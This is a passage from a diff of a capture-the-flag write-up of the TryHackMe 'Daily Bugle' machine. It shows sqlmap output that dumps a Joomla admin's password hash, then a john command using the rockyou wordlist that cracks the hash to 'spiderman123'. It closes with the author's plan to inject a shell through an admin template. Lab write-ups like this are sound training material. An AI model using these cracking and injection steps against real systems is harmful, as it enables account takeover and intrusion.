content/post/daily-bugle-boot2-root-writeup copy.md

```diff
@@ -0,0 +1,736 @@
+[21:36:24] [INFO] retrieved: '2019-12-14 20:43:49'
+[21:36:24] [INFO] retrieved: '1'
+[21:36:24] [INFO] retrieved: 'jonah'
+Database: joomla
+Table: #__users
+[1 entry]
++-----+------------+-------+---------------------+---------+--------------------------------------------------------------+----------+-----------+------------+---------------------+---------------------+
+| id  | name       | block | email               | params  | password                                                     | username | sendEmail | activation | registerDate        | lastvisitDate       |
++-----+------------+-------+---------------------+---------+--------------------------------------------------------------+----------+-----------+------------+---------------------+---------------------+
+| 811 | Super User | 0     | jonah@tryhackme.com | <blank> | $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm | jonah    | 1         | 0          | 2019-12-14 20:43:49 | 2019-12-15 23:58:06 |
++-----+------------+-------+---------------------+---------+--------------------------------------------------------------+----------+-----------+------------+---------------------+---------------------+
+
+[21:36:24] [INFO] table 'joomla.`#__users`' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.162.223/dump/joomla/#__users.csv'
+[21:36:24] [WARNING] HTTP error codes detected during run:
+500 (Internal Server Error) - 93 times
+[21:36:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.162.223'
+
+[*] ending @ 21:36:24 /2020-11-27/
+```
+
+This returned what looked like a valid set of hashed credentials. I decided to run the credentials through `john` using the rockyou wordlist to see if I could identify the user's password.
+
+### Cracking the hash
+I ran `john` with a parallelism of 2 due to my attack host's 2 vcpus and walked away to let this run. Eventually I was lucky to obtain a match.
+
+```
+root@kali:~/ctf# john joomla.john --wordlist=/usr/share/wordlists/rockyou.txt --fork=2
+Using default input encoding: UTF-8
+Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
+Cost 1 (iteration count) is 1024 for all loaded hashes
+Node numbers 1-2 of 2 (fork)
+Press 'q' or Ctrl-C to abort, almost any other key for status
+spiderman123     (jonah)
+2 1g 0:00:11:10 DONE (2020-11-27 21:52) 0.001491g/s 34.91p/s 34.91c/s 34.91C/s stargatesg1..speciala
+1 0g 0:00:12:00 DONE (2020-11-27 21:53) 0g/s 33.61p/s 33.61c/s 33.61C/s hotcake..honey04
+Waiting for 1 child to terminate
+Use the "--show" option to display all of the cracked passwords reliably
+Session completeds
+```
+
+![daily bugle admin panel](/img/daily_bugle_http_admin_panel.png)
+
+With these new-found credentials (`jonah:spiderman123`), I was able to get through to the admin panel. I imediately began clicking around to see if I could find a template or module that I could attempt to inject a shell into.
```

Comment:
...to see if I could find a template or module into which I could inject a shell